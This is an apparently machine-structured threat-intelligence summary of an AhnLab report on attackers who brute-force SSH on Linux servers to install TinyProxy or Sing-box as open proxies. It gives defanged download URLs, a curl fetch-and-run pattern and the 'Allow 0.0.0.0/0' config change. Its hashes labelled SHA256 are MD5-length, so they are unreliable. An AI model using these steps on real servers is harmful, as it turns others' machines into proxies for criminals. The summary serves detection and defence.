Full Report
AhnLab SEcurity intelligence Center (ASEC) monitors attacks targeting Linux servers that are inappropriately managed using honeypots. One of the representative honeypots is the SSH service that uses weak credentials, which is targeted by a large number of DDoS and coinminer attackers. ASEC has identified cases where Linux servers were attacked to install proxies. In […]
Analysis Summary
# Tool/Technique: TinyProxy
## Overview
TinyProxy is a lightweight HTTP/HTTPS proxy daemon designed to be used with lightweight operating systems. In the context of this attack, it is being installed and configured on compromised Linux servers to turn them into open proxy nodes, likely for the attackers to utilize or profit from.
## Technical Details
- Type: Tool (Abused Legitimate Software)
- Platform: Linux (via `apt`, `yum`, or `dnf` installation)
- Capabilities: Acts as a proxy server, in this case, configured for unrestricted external access.
- First Seen: N/A (Legitimate tool, abuse context is recent)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
- T1090.001 - Proxy: Multi-hop Proxy (Potential implied use)
## Functionality
### Core Capabilities
- Installed via system package managers (`apt`, `yum`, `dnf`).
- Configuration modification to bypass security controls.
### Advanced Features
- Configuration file modification (`/etc/tinyproxy/tinyproxy.conf` or `/etc/tinyproxy.conf`) to enforce `Allow 0.0.0.0/0`, which permits unrestricted external connections to the proxy port (8888).
## Indicators of Compromise
- File Hashes: ASHA256 hash (from associated malware execution) is `16d1dfa35d64046128290393512171ce` and `35d79027834a3b6270455f59b54f2e19` (Note: These hashes are explicitly listed for the overall attack chain involving the initial Bash malware execution, not just TinyProxy itself).
- File Names: `/etc/tinyproxy/tinyproxy.conf`, `/etc/tinyproxy.conf`
- Registry Keys: N/A
- Network Indicators: Infected system exposes port 8888 for proxy access.
- Behavioral Indicators: Modification or deletion of access control rules ( `Allow`/`Deny`) in the TinyProxy configuration file and addition of `Allow 0.0.0.0/0`.
## Associated Threat Actors
- Unspecified threat actors targeting vulnerable/poorly managed Linux servers.
## Detection Methods
- Signature-based detection: Signatures targeting the specific Bash malware used to deploy these tools (IOCs in AhnLab TIP).
- Behavioral detection: Monitoring for package installations of TinyProxy followed immediately by modification of its primary configuration file to globally allow access.
- YARA rules: N/A provided.
## Mitigation Strategies
- Use strong, periodically changed passwords to prevent initial SSH brute-force compromise.
- Apply system patches promptly.
- Implement host-based or network firewalls to restrict source access to servers, especially limiting inbound connections to non-essential ports.
## Related Tools/Techniques
- Sing-box
***
# Tool/Technique: Sing-box
## Overview
Sing-box is an open-source, multipurpose proxy tool capable of supporting protocols like vmess-argo, vless-reality, Hysteria2, and TUICv5. While often intended for legitimate use like bypassing geo-restrictions (e.g., for accessing ChatGPT or Netflix), attackers are installing it on compromised systems to establish unauthorized proxy nodes for illicit activities or profit.
## Technical Details
- Type: Tool (Abused Open-Source Software)
- Platform: Linux
- Capabilities: Serves as a versatile proxy supporting modern tunneling protocols for circumvention.
- First Seen: N/A (Open-source, but recent exploitation observed)
## MITRE ATT&CK Mapping
- TA0011 - Command and Control
- T1090 - Proxy
- T1090.001 - Proxy: Multi-hop Proxy (Potential implied use)
## Functionality
### Core Capabilities
- Installation via a Bash script downloaded from GitHub (`eooce/sing-box/main/sing-box.sh`).
- Establishment of a proxy service usable for external traffic routing.
### Advanced Features
- Support for advanced proxy protocols: vmess-argo, vless-reality, Hysteria2, TUICv5, allowing traffic obfuscation and evasion.
## Indicators of Compromise
- File Hashes: N/A specifically for Sing-box binary, but initial payload hashes present in the report (see TinyProxy) are relevant to the execution chain.
- File Names: N/A (Tool name itself)
- Registry Keys: N/A
- Network Indicators: The specific URLs used to download the installation scripts:
- `hxxps://raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh`
- Behavioral Indicators: Execution of suspicious Bash scripts retrieved from untrusted GitHub repositories via `curl -Ls` or `bash <(curl -Ls ...)`.
## Associated Threat Actors
- Unspecified threat actors aiming to establish proxy networks, potentially for profit or to conceal subsequent criminal activities.
## Detection Methods
- Signature-based detection: Monitoring for network connections to the GitHub URLs listed above.
- Behavioral detection: Observing the execution of shell commands that download and execute remote scripts using tools like `curl` or `wget` against GitHub source repositories to install proxy utilities.
- YARA rules: N/A provided.
## Mitigation Strategies
- Strict monitoring of external connection attempts (e.g., via proxy software) originating from servers that should only be running specific services.
- Control outbound access from sensitive servers where possible.
- Ensure administrative credentials are secure to prevent the initial remote execution of installation scripts.
## Related Tools/Techniques
- TinyProxy
- Initial execution via the malicious Bash script downloader.
***
# Technique: Installation of Proxy Tools via Initial Compromise
## Overview
Attackers gain initial access, typically via weak SSH credentials (brute-force targeting honeypots), and immediately execute a downloaded Bash script designed to install proxy software (TinyProxy or Sing-box) to convert the compromised Linux server into a proxy node.
## Technical Details
- Type: Technique (Execution and Defense Evasion related to Initial Access)
- Platform: Linux
- Capabilities: Rapid establishment of persistence and C2 channel infrastructure using legitimate or open-source tools.
- First Seen: Ongoing (Reported recently)
## MITRE ATT&CK Mapping
- TA0001 - Initial Access
- T1133 - External Remote Services (Implied: SSH Brute Force)
- TA0002 - Execution
- T1059.004 - Command and Scripting Interpreter: Unix Shell
- TA0005 - Defense Evasion
- T1027 - Obfuscated Files or Information (Use of deployment scripts)
## Functionality
### Core Capabilities
- Initial access achieved via successful SSH login using weak credentials.
- Execution of a downloader Bash script using `wget` or `curl`.
- Use of system package managers (`apt`, `yum`, `dnf`) to install the chosen proxy utility.
- Configuration hardening/modification to ensure the proxy tool allows external, unrestricted access.
### Advanced Features
- The initial deployment script leverages specific OS environment checks to choose the correct package manager.
- Persistence is often handled by the configuration changes made to the proxy service (e.g., ensuring the service starts on reboot or remains accessible).
## Indicators of Compromise
- File Hashes:
- Initial downloader script hash (SHA256 likely associated with payload at `hxxps://0x0[.]st/8VDs.sh`): Need to consult AhnLab TIP for precise match, but the delivery URL is key.
- File Names: `s.sh` (temporary name for the downloaded Bash script).
- Registry Keys: N/A
- Network Indicators:
- Initial C2/Download URL: `hxxps://0x0[.]st/8VDs.sh`
- Sing-box script source: `hxxps://raw[.]githubusercontent[.]com/eooce/sing-box/main/sing-box[.]sh`
- SSH authentication failures preceding successful login attempts.
- Behavioral Indicators: Successful remote login followed immediately by one-line commands downloading and executing remote shell scripts, use of `chmod +x`, and subsequent package installation commands.
## Associated Threat Actors
- Attackers focused on deploying proxy infrastructure, potentially reselling access or using it for further anonymous operations.
## Detection Methods
- Signature-based detection: Signatures for the known external hosting URLs.
- Behavioral detection: Monitoring for SSH logins that immediately spawn shell execution of externally sourced, non-whitelisted scripts (especially those using obfuscated `curl`/`wget` combinations).
- YARA rules: N/A provided.
## Mitigation Strategies
- **Strong Authentication:** Enforce mandatory use of strong, complex passwords for all accounts, especially SSH.
- **Brute-Force Protection:** Deploy fail2ban or similar tools to block repeated failed login attempts.
- **Patch Management:** Ensure the underlying operating system and services (like SSH) are fully patched.
- **Network Segmentation/Firewalls:** Restrict public exposure of sensitive management ports like SSH; if exposure is necessary, limit access based on source IP.
## Related Tools/Techniques
- TinyProxy
- Sing-box
- Automated SSH Login (T1110)